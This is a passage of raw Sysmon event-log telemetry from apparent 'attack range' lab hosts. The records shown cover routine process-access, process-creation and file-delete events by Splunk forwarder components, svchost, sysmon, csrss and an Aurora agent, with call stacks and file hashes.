Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016591Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016590Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016589Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016588Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016587Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016586Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016585Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016584Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016583Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016582Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E485-63C7-0302-00000000B002}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016581Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E485-63C7-0302-00000000B002}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016580Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-E485-63C7-0302-00000000B002}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016624Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.947{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40EBD91FEECF601FE653EF539EF2219C,SHA256=0FDC438F16526316034EED527730CBBAF716DC35638C45D14444150D0ACDDC52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016623Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.806{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=F1BD8BB075799790DD42B28916B90066,SHA256=2E497ADEB1BF52AAB2249D005332F792F9C622823E03AE189A81620C76EE9D39,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.958{FE4C2B44-E486-63C7-2B06-00000000AF02}62806920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.796{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E486-63C7-2B06-00000000AF02}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.796{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.796{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.796{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.796{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.796{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E486-63C7-2B06-00000000AF02}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.796{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E486-63C7-2B06-00000000AF02}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.672{FE4C2B44-E486-63C7-2B06-00000000AF02}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000042101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.656{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057CEC267C8BB9675C5CFB56A001AC80,SHA256=EC882991D69DE7AB06B37087D7327F8310CE8A007B3DD6BF03B423223F6ECC4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.484{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=EFABD88C1DEEFD42D3E3755286318252,SHA256=CF109D20E29544D6AE2F9E45A99F6C2A00589D56E89F286611253F944FD5A59F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.104{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.104{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.104{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.104{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program 